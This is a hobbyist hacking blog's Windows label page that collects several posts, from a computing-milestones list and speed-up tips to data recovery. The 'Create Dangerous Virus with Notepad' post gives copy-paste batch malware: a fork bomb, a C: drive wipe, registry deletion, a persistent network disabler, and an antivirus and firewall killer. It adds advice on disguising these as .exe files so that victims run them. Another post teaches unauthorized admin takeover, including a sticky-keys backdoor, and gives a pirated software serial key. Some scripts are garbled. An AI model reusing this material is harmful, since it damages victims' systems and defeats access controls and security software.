Showing posts with label Windows. Show all posts
Showing posts with label Windows. Show all posts

Milestones Of Computer World

If you are able to read this post than it means that probably you have a Desktop/Laptop/Tablet/Cell Phone, a working Internet connection and a Facebook account (chances are that you have come across my post in any Facebook Group). So, you can't deny the fact that Computer & Internet are playing a great role in your life. They are affecting you in many ways as you explore new stuffs, connect with friends, increase your business and entertain yourself. Today, one definition of being modern is that you are smart enough to handle smart phone as well as a Facebook/Whats app account. Am I right? Yes, I am.
But, the matter-of-fact is that the journey of computing- from Abacus to latest iPhone is not that easy at all. It took hundreds of year, hard labor, brilliant brain, innovative idea(s) and passion to develop computing. So, today I am going to share 10 milestones of Computer World. I have compiled the list in chronological order, not on the basis of importance.


1. Microsoft: Professionals' First Choice


Microsoft-the-best-computer-company

Microsoft Corporation (popularly known as Microsoft) is a big player of Computer Industry. It is a major computer hardware and software developer company. Founded by Bill Gates on 4th April 1975, Microsoft is best known for Windows operating system, Microsoft Office, Bing Search Engine and Outlook.

2. Apple: Royal Computer Company


Apple-Steve-Jobs
Apple is yet another Technology company famous for deleiver quality products and services. Apple Mac, iPod, iPad, iPhone, Apple TV, iOS, iTune- overall Apple brand provides you a new and amazing experience. Apple was founded by Steve Jobs and Steve Wozniak on 1st April 1976 in a garage.

3. Linux: Open Source Operating System


Linux-open-source-operating-system

Linux is a free Operating System related to Unix OS family. Initially released in 1991, Linux is a completely free as well as Open Source operating system. It was launched to challenge monopoly of Windows in O.S. market. There are so many Linux distribution available on Internet to download yet Kali Linux is most suitable distro for hackers.

4. Amazon: King Of E-Commerce







Amazon-king-of-e-commerce
Amazon is a e-commerce company founded by Jeff Bezos on 5th July 1994. It was started as an online bookstore but now it sells a variety of products including DVD, CDs, Software, Video, Games, Electronics, Apparel, Furniture, Toys in various countries. With an alexa rank of 8, Amazon is top e-commerce site. Yet, it is getting challenge from Snapdeal and Flipkart in India which resulted in recent E-Commerce war in India.

5. Google: Search Engine Giant


Search-engine-giant

If I say that Google is the synonym of Internet than you will probably trust me. Google re-defined the Internet in a new way. Founded by Larry Page and Sergey Brin on 4th September 1998, Google offers a variety of service like Search Engine, Gmail, Google Plus, Google Map, You Tube, Google Drive, Android O.S, Google Chrome, Blogger, Google Adsense and many more. Google is world's best Internet company with Alexa rank 1 due to all wonderful service it provides.

6. Blogging: Express Yourself On Web







Express-yourself-on-web

Honestly I would like to commit that today Blogging is the best way to express yourself and in a country like India, it is a medium to connect with mass audiences. The best blogging platform is Blogger- developed by Pyra Labs on 23rd August 1999 and further bought by Google in 2003. Blogger provides a free blogspot.com subdomain, unlimited bandwidth and storage space. Blogger blogs are hosted on Google's own server and it is almost impossible to hack them.

7. G.T.A. Series: Ultimate Entertainment Package


Ultimate Entertainment Package
You might wonder why I have included a game in this list. But, believe me, G.T.A. Series games are worthy of holding a place in the list. Developed by Rockstar Games in 2001, the game is very popular among teenager computer users. The game is based on Liberty City, Vice City & San Andreas which are stand-ins for New York , Miami and Southern California, respectively. The game falls in action-adventure category and lots of gun, weapon, tank, bike, car, other vehicles, dance club, helicopter, ambulance, sea beach, hotel make it very interesting to play.

8. Mozilla Firefox: Free & Open Source Web Browser


Free-and-open-source-web-browser
Once upon a time, Internet Explorer and Netscape Navigator were only web browser available for Internet users. However, on 23rd September 2002, Mozilla Foundation launched a new, free and Open Source Web Browser- Mozilla Firefox. Attractive design, stable performance, availability of plug-in and user friendly interface make Firefox so popular.

9. Facebook: Connect With Friends


connect-with-friends

Well, it is useless to introduce Facebook to you. Facebook is world's No.1 Social Networking site founded by Mark Zuckerberg on 4th February 2004. Today, it is the best medium to connect with friends and family as well as to discover new friends. It's motto is- Giving people the power to share and make the world more open and connected.

10. Play Store: Discover App And Games


Discover-apps-and-games

Google Play Store is a game and app downloading store started on 22nd October 2008. Play Store is available only for Android users. With 1.3+ million apps, it provides a lot of choices to users to download.
So, here my list ends. If you are not agree with my list then you can compile your own list and make me aware of it in comment box.

 
A personal message to You

 
It is nice to see that you have gone through "Milestones of Computer World" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Create Dangerous Virus with Notepad

create-dangerous-virus-with-notepad 
Viruses are malware which can cause a lot of harm to P.C., Computer and Laptop. Usually, they spread through sharing of files specially on Internet. Torrents file sharing and Email attachments are common ways to spread a virus.

Before going into detail, let me explain what a Batch File is? It is simply a text file, containing series of commands, which are executed automatically, line by line, when the batch file runs. I have used several commas to divide the sentence in many parts to make it easier to understand.

So, using Batch File you can create extremely dangerous viruses to delete the Windows files, format different drives(C:\,D:\,E:\), steal information, disable firewalls.

Now, here are some small yet extremely dangerous Batch File viruses. You need to just press Ctrl+C (Copy) and Ctrl+V (Paste) code in Notepad. After that save the notepad file as "anyname.bat". Be sure to use '.bat' as extension otherwise it will not work.



1. Application Bomber:-

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x


Function- Once executed, it will start to open different applications repeatedly which will affect system's performance. You can also add application of your choice in above code.


2. Folder Flooder-

@echo off
:x
md %random%
/folder.
goto x


Function- Once executed, it will start to generate folders whose name can be any random number.


3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x


Function- Once executed it will start creating Windows User Accounts whose name can be any random number.


4. Process Creator:-

%0|%0

Function:- Once executed, it will start to generate a large number of processes very quickly resulting in hanging of P.C.


5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE


Function- Once executed, it will disable the internet connection of a computer permanently.


6. O.S. Hacker:-

@Echo off
Del C:\ *.* |y


Function:- Once executed it will format C disk drive and hence resulting in deleting the O.S. You can also replace C with any drive of your choice.


7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE


Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim's computer.


8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


Function:- Once executed it will turn Caps Lock continuously on and off annoying the user.


9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem


Function:- Once executed it will disable the Anti Virus of the victim's system.

Drawback of a batch file viruse is that any one can open it with notepad and read the command easily. Also, any one can delete it if they find it harmful. So, to overcome the limitation/drawback, you can use a cool tool named 'Batch to Exe Converter'. It will convert the '.bat' extension into '.exe' extension. And your Batch file will be converted into an Application file. You can easily convince your victim to open the file.

A personal message to You 


It is nice to see that you have gone through "Post Facebook Status in Future" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Recover Deleted Files

Many-a-time, we delete unwanted files from our computer. After deleting, we can also recover them once as they become stored in Recycle Bin. But, what if you have deleted the file from Recycle Bin also and you need the file at that time? Perhaps you have no way instead of cursing your fate!!! But, wait a minute. You can recover them. How? Let me explain.


Step 1-
 

At first, go to official website of Recuva- http://www.piriform.com/recuva and download Recuva software from there.

Step 2-


 
install-recuva 
Once downloaded and installed, open it and simply click Next to proceed.

Step 3-


 
file-you-want-to-recover 
After that, choose file type want to recover. You can choose various options like Pictures, Music, Documents, Videos, Email and Compressed file. If your deleted file does not fit in the category then select "All Files" option and click Next to proceed.

Step 4-

 
 

choose-location-of-deleted-file 
Now, choose the location where your file was saved. If you do not know the exact location then simply select the option "I'm not sure" and click next to proceed.

Step 5-


 
search-deleted-files 
Now, you have almost done it. Click on the option "Enable Deep Scan" if you want to search more deeply. But, it will take more time. Click on Start button and sit back relaxed. Rest work will be done automatically.

Step 6-


 
recuva-scan-for-deleted-file 
Now, in 3 steps, Recuva will scan your drive for deleted files.

Step 7-


 
recuva-recovered-file 
At last, Recuva wizard will show you all recovered files. You can recover files having green circle only. Choose file and click on Recover. And, you have done it!!!
So, It is too easy to recover file and anyone can do it with Recuva. One important feature of Recuva is that it also makes you aware of your system specifications like Processor, RAM, Processor type etc.


A personal message to You
 

It is nice to see that you have gone through "Recover Deleted Files" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Hacking Windows User Account

 hack-windows-user-account

There are numerous ways available to hack the password of Admin account in Windows Operating System. Generally in School, College and Office, authorities block access to admin account. It annoys Students and Office Employee. Due to limited access, they can not download data from Internet, can not install software of their choices and so on... So, many of them want a way to get rid of it. In this post, You will be aware of every possible way to hack an user account.


1. Use Password Recovery Tool:-

 

ophcrack-user-password-recovery-tool 
You can crack the password of admin user account by using password recovery tools. There are many password recovery tools available on Internet such as Ophcrack, PC Login Now, Kon-Boot, John the Ripper, Windows Password Recovery tool 3.0 etc. I am going to explain about Ophcrack.

Ophcrack is a free password cracker tool based on Rainbow Table attack. It has a Graphical User Interface (G.U.I.) and it works on all operating system including Windows, Linux and Mac. So, at first download Ophcrack from Internet. I suggest you to download the Ophcrak LiveCD as it does not require installation.

For your comfort here is the link to download Ophcrack LiveCD- http://www.ophcrack.sourceforge.net/download.php/. 

On the download page, choose the version of Ophcrack LiveCD which is suitable for your target computer's operating system. For example, if you want to crack the password of Windows 7 operating system then select ophcrack Vista/7 LiveCD. 

Once downloaded, open the file. You will notice that it is a .iso file. You can not simply install it in a PC. You need to burn it into a CD/DVD to work it properly.

So, to burn the CD/DVD, you need a DVD/CD burning tool. I suggest you to use Power ISO. It is a small yet effective Disk Image utility. 

You can download it from http://www.poweriso.com/download.htm/. Once downloaded, install the software.

But after installing you will notice that the software is unregistered and you have to register or use trial version or enter serial key to register. Do not worry. Here I am providing you Name and Serial key to register yourself with Power ISO v4.7.

Name- TEAM CRUDE

Serial Key- U5ABB-FGU6Z-4DXQE-Z43TJ-9AP32.

Register yourself with the serial key. Once registered, Insert a blank CD/DVD into DVD drive of your computer. And burn the .iso image into CD/DVD using Power ISO. Be sure that you have to create a bootable CD/DVD. The steps are quite easy and it is useless to explain them in detail. Congrats!! You have created your own Password Cracker for Windows Vista/7 Operating System. 


Now, you have to crack the password of your target system. To do so, open the target computer and insert the CD/DVD (which you have created recently) into the DVD drive.

After that you have to change the boot device priority to boot computer from your recently created CD/DVD. To do so, you need to press certain key during booting of computer.

For example, I press F12 to enter "boot device selection" menu in my Toshiba laptop. Another way to select boot device priority is to open BIOS setup. BIOS stands for Basic Input Output System. It is a small programme installed in the microprocessor. To open BIOS setup you have to press certain key during booting of computer. For example, I press F2 to open BIOS setup in my Toshiba laptop. For more details you can use Google.

After opening BIOS setup, go to Boot option and select the boot device. In this case select CD/DVD as boot device and press Enter. Your computer will be restart and this time it will boot by Ophcrack CD/DVD and you can easily crack password from here.


2. Use RUN Command-

 

run-command-to-hack-windows-user-password  
This trick will work only if you have managed to gain access to admin account for some time. It might be possible when the person having admin account left his/her account open and went somewhere else. In that case, you can apply this trick. At first click on Start button. Now, go to RUN and open it. In the box, type "control userpasswords2" without quotes and press Enter. A new window will be opened now. From here you can Add new user account, Delete the old user account, Change account type (whether administrator or guest) of old user account, remove the password from any user account and finally you can change the password of any user account. So, Enjoy this very simple and cool trick.


3. Use Command Prompt-

 

command-prompt-trick-to-hack-windows-user-password 
Alike the previous trick, this trick too works only when you get access to admin account. To hack the user account, firstly go to Start and open RUN. 

In the box type "cmd" without quotes and press Enter. A new window will be opened now which is known as Command Prompt. 

In Command Prompt type "net user" without quotes and press Enter. This command will show you list of all accounts. 

Now, you have to choose the user account which you want to modify. To do so, now type "net user Admin *" without quotes and press Enter. Here 'Admin' shows the user account which you want to modify and * means Shift+8. 

After pressing Enter, you will be asked to enter a new password. Enter the password of your choice, Re-type it and press Enter.


4. Use Sticky Keys-

 

sticky-key-trick-to-hack-windows-user-account  
This trick can be useful in the condition where you managed to get access to admin account but you do not want to change the password at that time. But, in future too you want to get access to the admin account . Now, before going into detail be aware that this trick works only in Windows XP operating system, not in Windows 7 or Windows Vista. 

Also, you should know about Sticky Keys first. Sticky Keys are the accessibility feature provided by Microsoft to help Physically Disabled users. You can activate it by pressing Shift key 6-7 times. Now, let me discuss about setting a backdoor in computer so that you will be able to gain access to it in future. 

At first, click on Start button, and go to My Computer. 

Now go to C:\windows\system 32. Copy the file "cmd.exe" from there. 

Now, paste it on the desktop. Rename the file as"sethc.exe". 

Now, copy this (recently created file) "sethc.exe" and paste it in C:\windows\system 32. It will ask you to overwrite the file. Click yes. 

That is all. You have done it. Now, Log off the admin account. 

If the computer has multiple user accounts, then you will see now Log On screen. Here, press Shift key 6-7 time and you will see Command Prompt on the screen. So, now you can change password from here anytime.


5. Use Safe Mode-

 

safe-mode-trick-to-hack-windows-user-account  
This cool trick works on almost all version of Windows operating system. In my opinion this is the best trick to hack admin accounts as it does not need access to admin account or any tool. That is why I am sharing it in last. The trick is quite simple and effective.

At first, open your computer. Press F12 or other relevant key to enter into Boot Device Selection menu. 

Now, choose Hard Disk as Booting Device and press Enter. Now, a new black screen will appear where you have to choose from various options like 'Safe Mode', 'Safe Mode with Networking', 'Safe mode with Command Prompt', 'Open Windows normally', 'Last known good Configuration'. 

Choose 'Safe Mode' and press Enter. 

Now, you will come across a Log On screen where you will see several user accounts including "Administrator" named user account. Click on it to Log On. 

You will be surprised to know that it will not prompt you for the password. The reason is that whenever an user installs windows O.S. in computer, an account named "Administrator" having admin rights but no password is created automatically. But, this account is accessible only in Safe Mode. So, once opened the account, you can easily change the password of other accounts using Command Prompt trick described above.

A personal message to You 

It is nice to see that you have gone through "Hacking Windows User Account" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Introduction to Windows User Accounts

introduction-to-windows-user-account 
As I have described in my earlier post "Introduction to Windows" that Windows is the most popular Operating System and there are numerous tools and tricks available to hack it. I also described that Windows O.S. has an easy-to-use interface and a lot of features. One such feature is to setup Administrative account on Computer. Sometimes a computer is used by many users. In that case, the computer is called Shared Computer. So, here the question arises that how an user can maintain his/her privacy on a Shared Computer? The answer is Administrative Account. An user can create his/her own user account and protect his/her data and files by using password. You can create your own user account in computer. To do so, Click on Start < Control Panel < User Accounts. Now click on Create a new account. Pick a name for your user account, choose its type (whether Administrator or Limited), create a password, re-type it and press OK. Congrats!!! You have created your own user account. Another way to do so is to open RUN and type "control userpasswords2" without quotes and press Enter. Now, a new window will be opened. In that window, click on Add an account, follow the instructions (they are almost same as I described above) and create your own user account. Now let me discuss about type of User Accounts-

1. Administrator

2. Limited or Standard

3. Guest

Administrator user account has admin rights i.e. an admin can modify, delete all files, create and remove other accounts and gain access to other user accounts. It can also be protected by password. Limited user account has limited rights. It too can be protected by password but the owner can not modify files of admin user accounts. Guest user account has almost no rights. It can not be protected by using password. And owner can modify and create files only in Guest account. Guest Account is present in Windows O.S. by default. You just need to Turn it On. So, this is a brief description of different User Accounts of Windows operating system. In upcoming posts I shall describe ways to Hack an user account.

A personal message to You

  
It is nice to see that you have gone through "Introduction to Windows User Account" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Boost Up Your Windows


boost-up-the speed-of-windows-os

Windows is the world's most popular operating system. You can say that it is the KING of O.S. market. Users through out the world- from U.S.A. to U.K., from France to Italy, from Turkey to Russia, from India to Pakistan- all prefer to use Microsoft's product. The reason is its easy-to-use interface and a lot of features like Microsoft Office, Easy Internet Connectivity, Adobe Packages etc. But still Windows users have some problem with O.S. One such problem is slow performance of Windows. So, now I shall share some very easy and cool tricks to boost your windows and make it faster even with less system specifications.


1. Clean up the RAM:-

 

 
RAM stands for Random Access Memory. It is the vital component which affects the system performance. You can boost RAM by cleaning up the RAM.

To do so, open notepad and type "FREEMEM=SPACE(64000000)" without quotes.

Save this notepad file as "ram.vbs".

You can use any other name too but .vbs extension is necessary.

Now run this script and clean up the RAM.


2. Close unresponsive programme:-
 

use-task-manager-to-close-unresponsive-program  
Sometimes certain application stops to work which results in hanging of PC.

In that case, press Ctrl+Alt+Del and open Task Manager.

From here, you can close any application by simply selecting it and click on End Task.

But, if this too is not working then select the application, right click on it and select option "Go to process". 

It will take you to new tab. Again right click on the process and select End process option. It will certainly close the application.


3. Defragment Local Disk:-

defrag-local-disk  
You can increase your system performance by using a utility feature known as Disk Defragmentation

To defrag your local disk, click on Start and open My Computer.

Now, select Local Disk (C:) and right click on it.

Go to Properties and select it.

Now go to Tools tab. Under the tools tab select Defragment now option and defrag the local disk.


4. Disk Cleanup:-

disk-cleanup  
You can use this option to clean up your disk and remove unnecessary junk files.

To do so, click on Start button and open Search option.

In the search box type Disk Cleanup and press Enter.

A new window will be opened where you need to select the disk and click on OK button.

Now follow some easy steps and you have done it.


5. Disable Start up Programme:-

 

disable-startup-program  
Start up programme start with Windows start up. It means that too many start up programme can lead to affect the performance of Windows. So, you can disable unnecessary Start up programme to boost Windows Speed. 

To do so, click on Start button and open RUN.

In box, type msconfig and press Enter.

Now, go to Startup tab and uncheck the programme which you don't want to open during Start up. At last click on Apply and OK button.


6. Increase the RAM:-

 

increase-ram As I have described earlier that RAM is the vital component of a computer which affects the system performance. So, to boost up Windows, you need to increase your RAM. You can do it easily using a feature called Ready Boost. Only you need a Pen Drive or SD Card to do so. 

Insert the Pen Drive in the USB slot of the computer. 

You will see a new window on your desktop. It is Auto Play which provides you various option related to Pen Drive. 

Browse it, and click on option Ready Boost

Now, allocate the memory space to be used as RAM.


7. Stop Graphic Effect:-

 

stop-graphic-effect Graphic effects certainly make your computer attractive but it also affect the system performance. So, you can unblock more speed by stopping the graphic effects.

To do so, Click on Start button.

Go to RUN and type sysdm.cpl and press Enter.

Now, select Advanced tab and in Performance section, click on Settings button. 

Now, select the option Adjust for Best Performance and Apply it.


8. Increase Hard Disk Speed:-

 

increase-hard-disk-speed  
You can use this simple trick to increase Hard Disk speed and finally windows speed. To do so, click on Start button and open RUN.

Now, in box type devmgmt.msc and press Enter.

A new window will be opened.

Here, go to Disk Driver Entry and expand the entry by clicking on "+" button.

Now, double click on Hard Disk and select Policies tab. Finally, click on OK.


9. Increase your Processor Speed:-

 

increase-processor-speed  
Processor is another vital component which affects the system speed. So here is a trick to increase your processor speed without spending a single penny. 

To do so, click on Start button and open RUN

In the box, type control.exe powercfg.cpl and press Enter. 

A new window will be opened. 

Now, go to Change Plan Settings and click on Change Advanced Power Settings

Now, scroll down to reach Power Management

Expand it and also expand Minimum Processor State. Now, change its value to 100% and click on OK.

A personal message to You

  
It is nice to see that you have gone through "Boost Up your Windows" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Introduction to Windows



If you have even used P.C. for once then surely you will be aware of Windows. Windows is an operating System (in short o.s.) developed and sold by Microsoft Company. An operating system is an interface between an user and a computer. Now, let us have a look on popular version of Windows o.s.-

1. Windows 95
2. Windows 98
3. Windows 2000
4. Windows XP
5. Windows Vista
6. Windows 7
7. Windows 8
8. Windows 8.1

Among all of these O.S. Windows XP is most popular. It is even used in Banks and ATMs. Microsoft finally stopped providing support for Windows XP on 8th April 2014. Today most of the computer users use Windows operating system. Only a few others are using Mac, Linux operating system. The reason is that Windows provides an easy-to-use interface to its user. Even a novice can mess up with it and at least use Paint or MS Word!!! So, Windows is customized to meet the requirement of a general user. And it is the reason why most of the people use it. Here the role of a Hacker comes into the picture. As Windows is most popular o.s., many Hackers target to hack it. There are many ways available to Hack Windows. I shall make you aware of them in upcoming posts. Stay updated with us.

A personal message to You 

It is nice to see that you have gone through "Introduction to Windows" completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!